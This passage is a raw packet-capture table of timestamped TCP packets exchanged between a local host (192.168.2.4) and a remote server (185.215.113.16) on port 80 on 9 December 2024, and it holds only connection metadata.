Dec 9, 2024 08:08:16.059626102 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.059684038 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.059750080 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.063810110 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.064065933 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.076910019 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.077037096 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.077104092 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.079186916 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.079231977 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.079281092 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.083730936 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.083789110 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.083842993 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.088362932 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.088376045 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.088416100 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.093024969 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.093116999 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.093178988 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.097583055 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.097708941 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.097764969 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.101948977 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.102082014 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.102138996 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.106472015 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.106520891 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.106612921 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.106652021 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.111046076 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.111162901 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.111212969 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.115571022 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.115670919 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.115726948 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.120171070 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.120330095 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.120384932 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.124757051 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.124828100 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.124880075 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.129376888 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.129442930 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.129508018 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.133810043 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.133929968 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.133982897 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.138647079 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.138825893 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.138883114 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.142935038 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.143060923 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.143114090 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.147439003 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.147577047 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.147625923 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.152036905 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.152091026 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.152126074 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.156052113 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.156626940 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.156667948 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.156727076 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.156768084 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.179157019 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.179270983 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.179330111 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.181612968 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.181683064 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.251794100 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.251857042 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.251890898 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.251936913 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.253817081 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.253864050 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.253879070 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.254138947 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.258994102 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.259042978 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.269967079 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.270013094 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.270106077 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.270143032 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.271141052 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.271428108 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.271472931 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.273405075 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.273561001 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.273618937 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.279957056 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.279968977 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.280019045 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.280479908 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.280581951 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.280626059 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.283977032 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.284136057 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.284167051 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.284181118 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.287231922 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.287317991 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.287440062 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.287914038 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.290477991 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.290540934 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.290606022 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.292049885 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.293824911 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.293915987 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.293966055 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.297203064 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.297271967 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.297327995 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.300465107 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.300590992 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.300646067 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.303778887 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.303833961 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.303904057 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.304045916 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.307070971 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.307183981 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.307193995 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.307229042 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.309129953 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.309286118 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.309314013 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.309330940 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.311146975 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.311302900 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.311331034 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.311369896 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.313247919 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.313329935 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.313375950 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.315299034 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.315352917 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.315392971 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.317236900 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.317352057 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.317394018 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.319277048 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.319336891 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.319449902 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.320044041 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.321291924 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.321420908 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.321468115 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.323301077 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.323448896 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.323494911 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.325386047 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.325489044 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.325519085 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.325833082 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.327433109 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.327491045 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.327502966 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.327543974 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.329387903 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.329458952 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.329505920 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.331454992 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.331554890 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.331609964 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.333673000 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.333684921 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.333719969 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.333750010 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.335563898 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.335622072 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.335660934 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.335705996 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.337539911 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.337615013 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.337763071 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.337805033 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.339564085 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.339687109 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.339711905 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.339725018 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.341670990 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.341708899 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.341795921 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.341845989 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.343604088 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.343653917 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.343717098 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.343765020 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.345657110 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.345702887 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.345735073 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.345792055 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.347687006 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.347759962 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.347857952 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.347898960 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.349706888 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.349769115 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.349806070 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.443955898 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.444019079 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.444034100 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.444124937 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.444931030 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.444982052 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.445049047 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.445130110 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.447166920 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.447218895 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.447274923 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.447345018 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.449047089 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.449091911 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.449245930 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.449331999 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.451081038 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.451138020 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.451188087 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.451236010 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.460921049 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.460995913 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.460998058 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.461041927 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.461755991 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.461813927 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.462030888 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.462081909 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.462142944 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.462230921 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.463928938 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.463975906 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.464035034 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.464150906 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.465534925 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.465586901 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.465615988 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.465833902 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.467402935 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.467453957 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.467489958 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.467530966 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.469027042 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.469070911 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.469083071 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.469115973 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.470623016 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.470673084 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.470758915 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.470803022 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.472431898 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.472501040 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.472624063 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.472671032 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.473974943 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.474025965 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.474088907 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.474136114 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.475625038 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.475672007 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.475730896 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.475863934 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.477320910 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.477371931 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.477413893 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.477458000 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.478965998 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.479010105 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.479044914 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.479083061 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.480730057 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.480845928 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.480881929 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.480926991 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.482322931 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.482366085 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.482415915 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.482475042 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.483943939 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.484011889 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.484072924 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.484133005 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.485610962 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.485663891 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.485722065 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.485825062 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.487298965 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.487348080 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.487379074 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.487488031 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.488950968 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.488993883 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.489058018 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.489185095 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.490725040 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.490787029 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.490885973 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.490956068 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.492305040 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.492355108 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.492374897 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.492533922 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.493999004 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.494066954 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.494080067 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.494127035 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.495615005 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.495663881 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.495703936 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.495837927 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.497308969 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.497365952 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.497419119 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.497457027 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.498970032 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.499013901 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.499084949 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.499165058 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.500617027 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.500747919 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.500792980 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.502422094 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.502463102 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.502535105 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.502578020 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.503989935 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.504044056 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.504214048 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.504308939 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.505635023 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.505681038 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.505717039 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.505763054 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.507288933 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.507339954 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.507409096 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.507452965 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.509004116 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.509059906 CET	49783	80	192.168.2.4	185.215.113.16
